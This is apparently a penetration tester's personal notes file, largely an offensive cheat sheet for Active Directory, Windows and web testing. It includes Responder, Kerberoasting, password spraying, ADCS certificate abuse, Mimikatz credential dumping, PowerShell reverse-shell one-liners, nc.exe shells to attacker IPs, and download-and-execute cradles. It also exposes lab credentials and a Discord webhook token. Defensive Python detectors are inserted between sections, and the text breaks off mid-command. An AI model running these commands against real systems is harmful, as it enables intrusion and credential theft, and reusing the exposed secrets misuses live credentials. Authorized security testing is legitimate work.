Last active: October 27, 2025 00:09
anotacoes-super-importantes
ChatGPT queries{
Generate, all in English, first the name of a vulnerability for "internal IP address exposure", then a short and simple text about this vulnerability, then another short text about the mitigation of this vulnerability, and I would also like the CVSS calculation following the pattern "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N". Also two up-to-date, working reference links about this vulnerability.
Generate, all in English, a short and simple text about the "Printers With Default Credentials" vulnerability, in which it is possible to access printers with default credentials, then another short text about the mitigation of this vulnerability, this one only as bullet points, very direct and to the point. I would also like a short, pointed text about the impact of this vulnerability, and the CVSS calculation for this vulnerability following this example: "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N". Also two up-to-date, working reference links about this vulnerability, preferably also covering the mitigation.
Please generate a concluding text, in English, summarizing a pentest report for an AD environment in which the following vulnerabilities were found, highlighting the one with the highest severity:
You are a professional penetration tester working for the company FOO. You have just completed a web application test for the company BAR and are writing a report on the vulnerabilities found.
You found the following vulnerabilities during this engagement:
xss - medium
information disclosure - low
Write a conclusion briefly explaining the vulnerabilities, giving some insights into their potential impact. This conclusion should be 3 paragraphs long, and the vulnerabilities should not be in list format.
}
SSL report example: Timmins from HSN
AD Sec Assessment{
Use Responder
Try WinRM auth with each user obtained
Fake Machine Creation via DHCP Poisoning
If there is no user, run ldapnomnom or nxc smb DC_IP -u '' -p '' --users
Run Nessus and check everything for vulns
Check AD login with Guest (godap)
Check SMB shares with Guest and with no user
Check SMB shares with the users obtained
Check Kerberoasting and AS-REP Roasting on every AD
Check every web service with eyewitness
Check the password policy
Test user=pass with kerbrute
Check known vulnerabilities with netexec or linwinpwn
Check every host with signing False or similar for coercion
Check ADCS certificates
Run bloodhound
Run PingCastle (Windows)
Run sccmhunter.py
Check FTP with anonymous:anonymous
Look at https://hideandsec.sh/books/cheatsheets-82c/page/active-directory
Look at https://orange-cyberdefense.github.io/ocd-mindmaps/img/mindmap_ad_dark_classic_2025.03.excalidraw.svg
https://youtu.be/b0lLxLJKaRs
}
Web Assessment{
User Enum (login/register)
SSL/TLS
Password Recovery
Security Headers
Rate-Limit/CAPTCHA
Improper Error Handling
Directory Fuzzing and Wayback Machine
HTML Injection/XSS/SSTI
Password Policy
SQLI
CSRF
XSS(dangerouslySetInnerHTML, innerHTML, outerHTML, insertAdjacentHTML)
API and endpoints in JS
}
Windows Assessment{
CMD -> Powershell (powershell.exe)
whoami
whoami /groups
Get-LocalUser
Get-LocalGroup
ipconfig /all
route print
netstat -ano
Get-Process
whoami /priv
Get-ChildItem C:\xampp -Recurse -File | Select-String 'administrator' | Select-Object -Unique Path
Get-ChildItem C:\xampp -Recurse -File | Select-String 'password' | Select-Object -Unique Path
iwr('http://192.168.49.56:8000/winPEASx64.exe') -OutFile winpeas.exe
iwr('http://192.168.49.56:8000/Invoke-Mimikatz.ps1') -OutFile mimi.ps1
}
TestSSL{
./testssl.sh --color 3 --warnings=batch --quiet --ip one -s -p -U -E https://www.google.com
}
Setup{
apt update
apt install golang-go git jq eyewitness requests_toolbelt typer requests_ntlm
apt remove python3-httpx
go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest
python3 -m pip install sprayhound
git clone https://github.com/Macmod/godap
cd godap
go install .
echo 'export PATH=$PATH:/root/go/bin:/root/.local/bin' >> ~/.zshrc && source ~/.zshrc
git clone https://github.com/lefayjey/linWinPwn
cd linWinPwn
pipx ensurepath
chmod +x install.sh
./install.sh
go install github.com/lkarlslund/ldapnomnom@latest
go install github.com/ropnop/kerbrute@latest
git clone --depth 1 https://github.com/testssl/testssl.sh.git --branch 3.3dev
git clone https://github.com/fieu/discord.sh/
echo 'export WEBHOOK="https://discord.com/api/webhooks/1213279960853254165/Jd_DeSh2KC3GsgZpSVUXm_nKIwHdl35uCRkx2uU-2vOvNHjnivhGHPGnhEEiblL8XLxl"' >> ~/.zshrc && source ~/.zshrc
}
Scan{
mkdir scan && cd scan
nmap -sn -T2 -PR -iL ranges.txt | awk '/Nmap scan report for/ { if ($6 ~ /^\(/) gsub("[()]", "", $6); else $6=$NF; print $6 }' > hosts.txt
With masscan{
masscan -p1-65535 --rate=2000 -e eth0 -iL hosts.txt -oG masscan.gnmap
}
With nmap{
nmap -p 88,389,636,3268,3269,445,139,80,8080,22,21,23,443,111,135,137,138,3389,623,1414,1433,1883,3306,5432,5433,5985,5986,15672,27017,27018 -n -Pn -v -iL hosts.txt -oG nmap.gnmap -T1
}
awk '/Ports:/{ if ($1=="Host:") { ip=$2; start=5 } else if ($1=="Timestamp:"){ ip=$4; start=4 } gsub(/[()]/,"",ip); for(i=start;i<=NF;i++){ if ($i ~ /\/open\//){ gsub(/,$/,"",$i); split($i,a,"/"); ports[ip] = (ports[ip] ? ports[ip]","a[1] : a[1])}}} END{ for (ip in ports) print ip, ports[ip]}' nmap.gnmap | sort -V > targets.txt
mkdir output
while read line; do ip=$(echo $line | cut -d' ' -f1); ports=$(echo $line | cut -d' ' -f2 | sed 's/^,//'); nmap -v -Pn -sV --script "default,safe and not intrusive and not brute" -p $ports $ip -oN output/nmap_$ip.txt; done < targets.txt
}
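The awk one-liner above turns greppable (-oG) output into targets.txt. The following is an added example, not part of the original notes: a Python parser for the same format that handles both the nmap "Host:" layout and the masscan "Timestamp:" layout, skips closed/filtered entries, and renders the same "ip port,port" lines. The scan output embedded in it is constructed sample data, and the sort key assumes IPv4 addresses.

```python
"""Parse greppable nmap/masscan output (-oG) into {ip: [open ports]}."""
import re
from collections import defaultdict

# Constructed sample: nmap -oG lines (with a hostname) plus masscan -oG lines.
SAMPLE_GNMAP = """\
# Nmap 7.94 scan initiated Mon Jan  1 00:00:00 2024 as: nmap -p- -oG nmap.gnmap 10.0.0.0/24
Host: 10.0.0.5 (dc01.domain.local)\tStatus: Up
Host: 10.0.0.5 (dc01.domain.local)\tPorts: 88/open/tcp//kerberos-sec///, 389/open/tcp//ldap///, 445/open/tcp//microsoft-ds///, 3389/closed/tcp//ms-wbt-server///\tIgnored State: filtered (65531)
Timestamp: 1700000000 Host: 10.0.0.7 () Ports: 80/open/tcp////
Timestamp: 1700000001 Host: 10.0.0.7 () Ports: 443/open/tcp////
# Nmap done at Mon Jan  1 00:01:00 2024 -- 256 IP addresses (2 hosts up) scanned
"""

_PORT_RE = re.compile(r"(\d+)/open/(tcp|udp)/")
_HOST_RE = re.compile(r"Host: (\S+)")


def parse_gnmap(text):
    """Return {ip: sorted list of (port, proto)} for every open port in -oG text."""
    results = defaultdict(set)
    for line in text.splitlines():
        # Comment lines and "Status: Up" lines carry no port information.
        if line.startswith("#") or "Ports:" not in line:
            continue
        host_match = _HOST_RE.search(line)
        if not host_match:
            continue
        ip = host_match.group(1)
        # Only the "Ports:" column is scanned, so a hostname in parentheses
        # or the "Ignored State" summary can never produce a false match.
        ports_section = line.split("Ports:", 1)[1].split("Ignored State:", 1)[0]
        for port, proto in _PORT_RE.findall(ports_section):
            results[ip].add((int(port), proto))
    return {ip: sorted(ports) for ip, ports in results.items()}


def _ip_key(ip):
    """Numeric sort key for dotted IPv4 addresses (assumption: IPv4 only)."""
    return tuple(int(octet) for octet in ip.split("."))


def targets_lines(text):
    """Render the same 'ip port,port,...' lines the awk one-liner writes to targets.txt."""
    parsed = parse_gnmap(text)
    return [
        f"{ip} {','.join(str(port) for port, _ in ports)}"
        for ip, ports in sorted(parsed.items(), key=lambda item: _ip_key(item[0]))
    ]


if __name__ == "__main__":
    for line in targets_lines(SAMPLE_GNMAP):
        print(line)
```

Feed a real file with `targets_lines(open("nmap.gnmap").read())`; the masscan file parses the same way because only the "Host:" and "Ports:" columns are read.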
Responder{
responder -I eth0 -wd | tee -a responder.txt
awk '!seen[$0]++' responder.txt > responder_clean.txt
}
Hashcat{
NTLMv2-SSP: .\hashcat.exe -m 5600 -a 0 .\techboss.hash rockyou2021.txt
}
Kerberoasting{
GetUserSPNs.py -request -dc-ip 192.168.54.97 secura.yzx/charlotte:'Game2On4.!'
}
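The detection counterpart of the GetUserSPNs.py line above, as an added example that is not part of the original notes: a tool of that kind requests a TGS for every SPN-bearing account at once, usually asking for RC4 (etype 0x17), so one account requesting tickets for many distinct services inside a short window is the signal a defender looks for in 4769 events. The records below are constructed and already parsed; the field names (account, service, etype, client) are this example's own mapping of the 4769 fields TargetUserName, ServiceName, TicketEncryptionType and IpAddress.

```python
"""Flag Kerberoasting-style TGS request bursts in Windows Security 4769 events."""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"  # etype that Kerberoasting tools typically request

SAMPLE_4769 = [  # constructed sample records
    {"time": "2024-01-01T10:00:01", "account": "charlotte@SECURA.YZX", "service": "svc_sql", "etype": "0x17", "client": "10.0.0.50"},
    {"time": "2024-01-01T10:00:02", "account": "charlotte@SECURA.YZX", "service": "svc_web", "etype": "0x17", "client": "10.0.0.50"},
    {"time": "2024-01-01T10:00:02", "account": "charlotte@SECURA.YZX", "service": "svc_backup", "etype": "0x17", "client": "10.0.0.50"},
    {"time": "2024-01-01T10:00:03", "account": "charlotte@SECURA.YZX", "service": "svc_mssql2", "etype": "0x17", "client": "10.0.0.50"},
    {"time": "2024-01-01T10:00:03", "account": "charlotte@SECURA.YZX", "service": "DC01$", "etype": "0x17", "client": "10.0.0.50"},
    {"time": "2024-01-01T10:30:00", "account": "bob@SECURA.YZX", "service": "svc_sql", "etype": "0x12", "client": "10.0.0.60"},
    {"time": "2024-01-01T11:00:00", "account": "alice@SECURA.YZX", "service": "svc_web", "etype": "0x17", "client": "10.0.0.70"},
]


def find_kerberoast_bursts(events, window=timedelta(minutes=5), min_services=3):
    """Return one alert per requesting account that asked for RC4 service
    tickets for >= min_services distinct services inside any window.
    Machine accounts (name ending in $) and krbtgt are ignored: their
    passwords are long random values, so their tickets are not what a
    Kerberoasting run is after, and normal hosts request them constantly."""
    by_account = defaultdict(list)
    for ev in events:
        if ev["etype"] != RC4_HMAC:
            continue
        svc = ev["service"]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        by_account[ev["account"]].append((datetime.fromisoformat(ev["time"]), svc, ev["client"]))

    alerts = []
    for account, reqs in by_account.items():
        reqs.sort()
        best = set()
        start = 0
        # Sliding window over the time-ordered requests; keep the largest set
        # of distinct services seen inside any single window.
        for end in range(len(reqs)):
            while reqs[end][0] - reqs[start][0] > window:
                start += 1
            services = {s for _, s, _ in reqs[start:end + 1]}
            if len(services) > len(best):
                best = services
        if len(best) >= min_services:
            alerts.append({
                "account": account,
                "clients": sorted({c for _, _, c in reqs}),
                "services": sorted(best),
            })
    return alerts


if __name__ == "__main__":
    for alert in find_kerberoast_bursts(SAMPLE_4769):
        print(alert)
```

Tune `min_services` to the environment: a domain with only two or three service accounts needs a lower threshold, and a single RC4 request from an account that otherwise uses AES is itself worth a look.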
Dump SMB (without downloading){
pipx install git+https://github.com/blacklanternsecurity/MANSPIDER
cd /root/.local/share/pipx/venvs/man-spider/lib/python3.13/site-packages/man_spider/lib/parser
(edit parser.py changing 5 to 50)
manspider -d domain.local -u user -p pass servers.txt -t 10 -c passw key login user -e bat com vbs ps1 psd1 psm1 pem key rsa pub reg txt cfg conf config xml cspkg publishsettings json cnf sql -n 2>&1 | tee -a smb_complete_output.txt
awk '!seen[$0]++' smb_complete_output.txt > smb_clean.txt
}
Dump SMB (downloading){
manspider -d domain.local -u user -p pass servers.txt -t 10 -c passw key login user -e bat com vbs ps1 psd1 psm1 pem key rsa pub reg txt cfg conf config xml cspkg publishsettings json cnf sql 2>&1
cd /root/.manspider
zip loot.zip -r loot
python3 -m http.server
}
Webs{
awk '
/Nmap scan report for/ {gsub("[()]", "", $NF); ip=$NF}
/^[0-9]+\/tcp/ {
split($1, p, "/")
port=p[1]
capture=0
}
/http-title/ {
capture=1
}
capture && ip && port {
print ip ":" port
capture=0
}
' *.txt > http-hosts.txt
httpx -l http-hosts.txt -o httpx-hosts.txt
eyewitness -f httpx-hosts.txt -d screen
./run-ffuf.sh httpx-hosts.txt /usr/share/dirb/wordlists/big.txt | tee -a ffuf-output.txt
#!/bin/bash
if [ $# -ne 2 ]; then
echo "Use: $0 <hosts_file> <wordlist>"
exit 1
fi
HOSTS_FILE="$1"
WORDLIST="$2"
STATUSCODES="200-299,301,302,307,401,403,405,500"
USERAGENT="Mozilla/5.0 (Linux; Android 13; SM-G998B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Mobile Safari/537.36"
if [ ! -f "$HOSTS_FILE" ]; then
echo "Can't find '$HOSTS_FILE'!"
exit 2
fi
if [ ! -f "$WORDLIST" ]; then
echo "Can't find '$WORDLIST'!"
exit 3
fi
# Loop over the hosts (httpx output already carries the scheme, e.g. http://host:port)
while IFS= read -r HOST || [ -n "$HOST" ]; do
echo "[*] Running ffuf on $HOST/FUZZ"
ffuf -w "$WORDLIST" \
-u "$HOST/FUZZ" \
-mc "$STATUSCODES" \
-c \
-H "User-Agent: $USERAGENT" \
-ac </dev/null   # stdin redirected so ffuf cannot swallow the rest of the hosts file
done < "$HOSTS_FILE"
}
Download all files from a directory file enum{
sudo apt install httrack
httrack 'http://172.21.101.25/global/' -O ./mirror-listagem "-*" "+http://172.21.101.25/global/*" "-*[>10240]"
}
Bruteforce users Blackbox{
wget https://github.com/danielmiessler/SecLists/raw/refs/heads/master/Usernames/xato-net-10-million-usernames.txt
mv xato-net-10-million-usernames.txt 10kk_usernames.txt
ldapnomnom --input 10kk_usernames.txt --output users_found.txt --dnsdomain domain.local --maxservers 32 --parallel 16
}
Password Spray{
Pass Policy{
netexec smb 10.100.207.24 -d domain.local -u user -p pass --pass-pol
}
Spray{
sprayhound -U users.txt --lower -d domain.local -dc 172.20.100.100
netexec smb 192.168.1.101 -u users.txt -p Summer18 --continue-on-success | grep -v 'STATUS_LOGON_FAILURE'
}
user=pass{
for i in $(cat users_found.txt); do echo $i:$i; done > useraspasswd.txt
kerbrute bruteforce useraspasswd.txt -d domain.local --dc 10.100.207.24 -t 5 --safe
}
}
Safe Spray{
#!/bin/bash
# Check arguments
if [ "$#" -ne 4 ]; then
echo "Uso: $0 <target> <arquivo_usuarios> <senha> <limite_lockout>"
echo "Exemplo: $0 192.168.1.24 users.txt 'Senha123' 10"
exit 1
fi
TARGET="$1"
USERFILE="$2"
PASSWORD="$3"
LOCKOUT_LIMIT="$4"
LOCKED=0
# Run netexec and watch the results. grep must be line-buffered, otherwise the
# lockout lines sit in the pipe buffer and the abort fires far too late.
netexec smb "$TARGET" -u "$USERFILE" -p "$PASSWORD" --continue-on-success 2>&1 | grep --line-buffered -v 'STATUS_LOGON_FAILURE' | while read line; do
echo "$line"
if echo "$line" | grep -q "STATUS_ACCOUNT_LOCKED_OUT"; then
LOCKED=$((LOCKED + 1))
echo "[!] Lockout detectado! Total: $LOCKED"
if [ "$LOCKED" -ge "$LOCKOUT_LIMIT" ]; then
echo "[!] Limite de lockouts atingido ($LOCKED). Abortando ataque!"
pkill -f "netexec smb $TARGET"
break
fi
fi
done
}
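The blue-team view of the spray commands above, as an added example that is not part of the original notes: a spray is one source failing once or twice against many different accounts, which separates it from a brute force against a single account. The check below reads 4625 (failed logon), 4624 (successful logon) and 4740 (account locked out) records, flags any source that fails against at least `min_users` distinct accounts inside a window, and attaches the successes and lockouts from that source so an analyst sees what the spray actually achieved. The CSV is constructed sample data in a simplified shape; the column names are this example's own.

```python
"""Detect password-spray patterns in Windows logon audit events."""
import csv
import io
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_LOG = """\
time,event_id,user,source_ip,status
2024-01-01T09:00:00,4625,alice,10.0.0.50,0xC000006D
2024-01-01T09:00:01,4625,bob,10.0.0.50,0xC000006D
2024-01-01T09:00:01,4625,carol,10.0.0.50,0xC000006D
2024-01-01T09:00:02,4625,dave,10.0.0.50,0xC000006D
2024-01-01T09:00:02,4625,erin,10.0.0.50,0xC000006D
2024-01-01T09:00:03,4624,frank,10.0.0.50,0x0
2024-01-01T09:00:04,4740,erin,10.0.0.50,
2024-01-01T09:05:00,4625,alice,10.0.0.60,0xC000006D
2024-01-01T09:06:00,4625,alice,10.0.0.60,0xC000006D
2024-01-01T09:07:00,4625,alice,10.0.0.60,0xC000006D
"""


def parse_events(text):
    """Parse the constructed CSV into dicts with datetime 'time' and int 'event_id'."""
    rows = []
    for row in csv.DictReader(io.StringIO(text)):
        row["time"] = datetime.fromisoformat(row["time"])
        row["event_id"] = int(row["event_id"])
        rows.append(row)
    return rows


def detect_spray(events, window=timedelta(minutes=10), min_users=5):
    """Return one alert per source IP whose failures hit >= min_users distinct
    accounts inside any window. One account failing many times from a source
    is a brute force, not a spray, and is deliberately not reported here."""
    failures = defaultdict(list)
    successes = defaultdict(set)
    lockouts = defaultdict(set)
    for ev in events:
        if ev["event_id"] == 4625:
            failures[ev["source_ip"]].append((ev["time"], ev["user"]))
        elif ev["event_id"] == 4624:
            successes[ev["source_ip"]].add(ev["user"])
        elif ev["event_id"] == 4740:
            lockouts[ev["source_ip"]].add(ev["user"])

    alerts = []
    for ip, attempts in failures.items():
        attempts.sort()
        best = set()
        start = 0
        # Sliding window over the time-ordered failures; keep the largest set
        # of distinct accounts seen inside any single window.
        for end in range(len(attempts)):
            while attempts[end][0] - attempts[start][0] > window:
                start += 1
            users = {u for _, u in attempts[start:end + 1]}
            if len(users) > len(best):
                best = users
        if len(best) >= min_users:
            alerts.append({
                "source_ip": ip,
                "users": sorted(best),
                "successes": sorted(successes[ip]),
                "lockouts": sorted(lockouts[ip]),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_spray(parse_events(SAMPLE_LOG)):
        print(alert)
```

The `--continue-on-success` run above produces exactly this shape in the DC's Security log: a burst of 4625 with distinct TargetUserName values from one IpAddress, then a 4624 for the account that matched and, if the threshold was crossed, 4740 events.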
Certificates{
certipy find -u 'user@domain.htb' -p '123' -dc-ip 10.22.20.121 -ns 10.22.20.121 -vulnerable -enabled -dns-tcp -output vulns.local
ESC8: https://www.hackingarticles.in/adcs-esc8-ntlm-relay-to-ad-cs-http-endpoints/
certipy req -username 'KaliPC$' -password 'Password#1' -ca AUTHORITY-CA -target authority.authority.htb -dc-ip 10.129.229.56 -template CorpVPN -upn administrator@authority.htb -debug
certipy cert -pfx administrator.pfx -nokey -out user.crt
certipy cert -pfx administrator.pfx -nocert -out user.key
python3 passthecert.py -action ldap-shell -crt user.crt -key user.key -domain authority.htb -dc-ip 10.129.229.56
}
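What `certipy find -vulnerable` is checking for when it reports a template like the CorpVPN one above, as an added example that is not part of the original notes or of Certipy: the ESC1 pattern is an enabled template where the requester supplies the subject, the certificate carries an authentication EKU, no manager approval or authorized signature is required, and a low-privilege group can enroll. The audit below expresses each condition against the template attributes (msPKI-Certificate-Name-Flag, msPKI-Enrollment-Flag, msPKI-RA-Signature, pKIExtendedKeyUsage, enrollment ACE principals) and names the fix. The templates are constructed sample data and the list of "low privilege" principals is an assumption for the demonstration.

```python
"""Audit AD CS certificate templates for the ESC1 misconfiguration."""

# Flag bits that matter for ESC1.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # msPKI-Certificate-Name-Flag: requester picks subject/SAN
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # msPKI-Enrollment-Flag: CA manager approval required

# EKUs that let the issued certificate authenticate as the named principal.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}

# Assumption for this example: principals that should never hold enroll rights on such a template.
LOW_PRIV_PRINCIPALS = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}

# Constructed sample templates. An empty 'ekus' list means no EKU restriction at all.
SAMPLE_TEMPLATES = [
    {"name": "CorpVPN", "enabled": True, "name_flag": 0x1, "enrollment_flag": 0x0, "ra_signatures": 0,
     "ekus": ["1.3.6.1.5.5.7.3.2"], "enroll": ["Domain Users", "Domain Admins"]},
    {"name": "User", "enabled": True, "name_flag": 0x0, "enrollment_flag": 0x0, "ra_signatures": 0,
     "ekus": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4"], "enroll": ["Domain Users"]},
    {"name": "ApprovedVPN", "enabled": True, "name_flag": 0x1, "enrollment_flag": 0x2, "ra_signatures": 0,
     "ekus": ["1.3.6.1.5.5.7.3.2"], "enroll": ["Domain Users"]},
    {"name": "AdminOnly", "enabled": True, "name_flag": 0x1, "enrollment_flag": 0x0, "ra_signatures": 0,
     "ekus": ["1.3.6.1.5.5.7.3.2"], "enroll": ["Domain Admins"]},
    {"name": "WebServer", "enabled": True, "name_flag": 0x1, "enrollment_flag": 0x0, "ra_signatures": 0,
     "ekus": ["1.3.6.1.5.5.7.3.1"], "enroll": ["Domain Computers"]},
    {"name": "OldVPN", "enabled": False, "name_flag": 0x1, "enrollment_flag": 0x0, "ra_signatures": 0,
     "ekus": ["1.3.6.1.5.5.7.3.2"], "enroll": ["Domain Users"]},
]


def esc1_checks(template):
    """Evaluate every ESC1 condition for one template; all must hold for a finding."""
    return {
        "enabled": template["enabled"],
        "enrollee supplies subject": bool(template["name_flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
        "no manager approval": not (template["enrollment_flag"] & CT_FLAG_PEND_ALL_REQUESTS),
        "no authorized signatures": template["ra_signatures"] == 0,
        "authentication EKU": not template["ekus"] or bool(AUTH_EKUS & set(template["ekus"])),
        "low-privilege enrollment": bool(LOW_PRIV_PRINCIPALS & set(template["enroll"])),
    }


def find_esc1(templates):
    """Return the templates meeting every ESC1 condition, with who can enroll and the fix."""
    findings = []
    for template in templates:
        checks = esc1_checks(template)
        if all(checks.values()):
            findings.append({
                "template": template["name"],
                "enrollable_by": sorted(LOW_PRIV_PRINCIPALS & set(template["enroll"])),
                "fix": "clear ENROLLEE_SUPPLIES_SUBJECT, or require manager approval, "
                       "or remove the low-privilege enroll ACE",
            })
    return findings


if __name__ == "__main__":
    for finding in find_esc1(SAMPLE_TEMPLATES):
        print(finding)
```

Each of the non-flagged samples fails exactly one condition (subject not supplied by the enrollee, manager approval set, admin-only enrollment, server-auth EKU only, template disabled), which is the same reasoning a remediation ticket should cite: any single one of those changes closes the finding.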
Change password remotely{
changepasswd.py 'domain.local/user@10.100.100.10' -p rpc-samr
}
godap{
godap IP -p '1' #no creds
godap IP -u 'DOMAIN\user' -p 'Welcome123!' #format 1
godap IP -u 'user@DOMAIN' -p 'Senha' #format 2
List users after saving, e.g. high-privilege users
jq -r '.Data[] | .Attributes[] | select(.Name == "sAMAccountName") | .Values[]' 1750955105754_results.json
}
List users{
netexec smb 10.201.0.6 --users
}
Create computer{
impacket-addcomputer -computer-name 'KaliPC$' -computer-pass 'Password#1' -dc-host 10.129.229.56 'authority.htb/svc_ldap:lDaP_1n_th3_cle4r!'
}
List Domains {
#!/bin/bash
ARQUIVO="$1"
# Check that the file exists
if [ ! -f "$ARQUIVO" ]; then
echo "Arquivo '$ARQUIVO' não encontrado!"
exit 2
fi
while IFS= read -r ip || [ -n "$ip" ]; do
[ -z "$ip" ] && continue # Skip empty lines
echo "🔎 Verificando $ip..."
# Anonymous base query for namingContexts; the awk turns DC=a,DC=b into a.b
ldapsearch -x -H ldap://"$ip" -s base namingContexts 2>/dev/null | \
awk '/^namingContexts: DC=/ {
gsub(/,DC=/, ".", $0);
split($0, parts, ": ");
sub(/^DC=/, "", parts[2]);
print " → " parts[2]
}'
echo
done < "$ARQUIVO"
}
PowerView{
RunWithRegistryNonAdmin.bat
. PowerView.ps1
Forest domains{
Get-ForestDomain -Verbose
}
User list{
Get-DomainUser | select -ExpandProperty samaccountname
}
Computer list{
Get-DomainComputer | select -ExpandProperty dnshostname
}
Domain Admins list{
Get-DomainGroupMember -Identity "Domain Admins"
}
List OUs{
Get-DomainOU | select -ExpandProperty name
}
List Unconstrained Delegation{
Get-DomainComputer -Unconstrained | select -ExpandProperty name
}
List Constrained Delegation{
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth
}
Get the SID{
Get-DomainSid ; Get-DomainSid -Domain finance.corp
}
}
Log in with a ticket{
Powershell: Enter-PSSession -ComputerName tech-dc
Cmd: winrs -r:tech-dc cmd
}
Mimikatz{
https://tools.thehacker.recipes/mimikatz/modules
iwr('http://192.168.49.56:8000/Invoke-Mimikatz.ps1') -OutFile mimi.ps1
Set-ExecutionPolicy -ExecutionPolicy bypass -Scope LocalMachine -Force
Import-Module .\mimi.ps1 -Force
Invoke-Mimikatz -DumpCreds
Invoke-Mimikatz -Command '"token::elevate" "privilege::debug" "sekurlsa::logonpasswords"'
Invoke-Mimikatz -Command '"vault::cred /patch"'
Invoke-Mimikatz -Command '"sekurlsa::credman"'
Invoke-Mimikatz -Command '"lsadump::sam"'
Invoke-Mimikatz -Command '"lsadump::cache"'
Invoke-Mimikatz -Command '"lsadump::secrets"'
Architecture problem (32-bit shell on a 64-bit host):
& "$env:WINDIR\Sysnative\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Write-Host 'Is64BitProcess=' ([Environment]::Is64BitProcess); Set-Location '$pwd'; Import-Module .\Invoke-Mimikatz.ps1 -Force; Invoke-Mimikatz -DumpCreds"
}
DONPAPI{
donpapi collect -u Administrator -p 'Password321' --domain thm.local --dc-ip 10.10.118.180 --fetch-pvk
donpapi gui
}
View the machine's admins{
net localgroup Administrators
}
List files recursively{
gci -recurse
}
Solve windows2Linux{
dos2unix file.sh
}
Find things on Linux{
find / -type f -readable 2>/dev/null | while read -r file; do
grep -IEni --color=always -E 'password|passwd|pwd|user(name)?|login|credential|secret|token|key|auth' "$file" 2>/dev/null | cut -c -300 | sed "s|^|$file:|"
done | tee resultados_busca.txt
Trufflehog
rg -i -F --hidden password -M 1024
}
Invoke as another user{
runas
OR ->
$pw = convertto-securestring -AsPlainText -Force -String SENHA-SENHA
$cred = new-object -typename System.Management.Automation.PSCredential -argumentlist "Domain\User",$pw
Enter-PSSession -ComputerName localhost -Credential $cred
Enter-PSSession -Id 1
OR ->
Invoke-Command -ScriptBlock {whoami} -Credential $cred -computername localhost
}
Run a command on another Windows host{
PsExec.exe \\srv.domain.local cmd
psexec.py Domain/user:pass@host command
or
psexec.py Domain/user@host #it gives you a shell
evil-winrm -i 10.129.96.155 -u melanie -p 'Welcom123!' # Via WinRM
winrs -r:dcorp-mgmt "cmd /c whoami" #Via WinRM
mstsc.exe
}
Run an exe in powershell and save the output to a file{
cmd /c "file.exe > output.txt"
}
Potato{
Get the CLSID (https://github.com/ohpe/juicy-potato/tree/master/CLSID/Windows_Server_2008_R2_Enterprise)
certutil.exe -urlcache -split -f "http://10.10.14.5:1335/CLSID.list" CLSID.list
certutil.exe -urlcache -split -f "http://10.10.14.5:1335/test.bat" test.bat
certutil.exe -urlcache -split -f "http://10.10.14.5:1335/JuicyPotato.exe" JuicyPotato.exe
test.bat
type result.log (look for NT SYSTEM)
juicypotato.exe -l 1234(any port) -p nc.exe -a " -nv 10.10.14.5 1339 -e cmd.exe" -t * -c {d20a3293-3341-4ae8-9aaf-8e397cb63c34}
or
.\JuicyPotato.exe -l 443 -p c:\windows\system32\cmd.exe -a "/c c:\Users\charlotte\Desktop\nc.exe -e cmd.exe 192.168.45.245 443" -t *
}
I have a webshell, now what?{
CMD to POWERSHELL:
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('IP',8888);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Or if more bypass flags are needed:
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("IP",8443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
}
Upgrade TTY shell{
python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl + Z
stty echo -raw; fg
export TERM=xterm
}
Download SMB{
recurse ON
prompt OFF
mget *
}
Download a file{
msiexec /q /i https://github.com/kalinathalie/qualquercoisa.txt
certutil.exe -urlcache -split -f "https://github.com/kalinathalie/qualquercoisa.txt" c:\windows\temp\agoravai.txt
powershell -c "iwr('https://github.com/kalinathalie/qualquercoisa.txt')|iex" #and execute it
powershell -c "iwr('http://10.10.14.3/file.exe') -OutFile file.exe"
powershell -nop -exec bypass -w 1 iex(New-Object net.webclient).DownloadString('http://10.10.14.3/file.exe')
powershell wget http://ip/file.exe -O file.exe
}
Zip a folder{
powershell "Add-Type -A System.IO.Compression.FileSystem; [IO.Compression.ZipFile]::CreateFromDirectory('D:/OpaOpa', 'C:/Temp/OpaOpa.zip')"
}
Search files recursively{
powershell Get-ChildItem C:\ -recurse -include "access.log"
FINDSTR /L /S /I /N /C:"algo" *.txt
findstr /s /m /c:"password" *
}
Install msfconsole{
wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run
}
Meterpreter shell{
msfconsole
use multi/handler
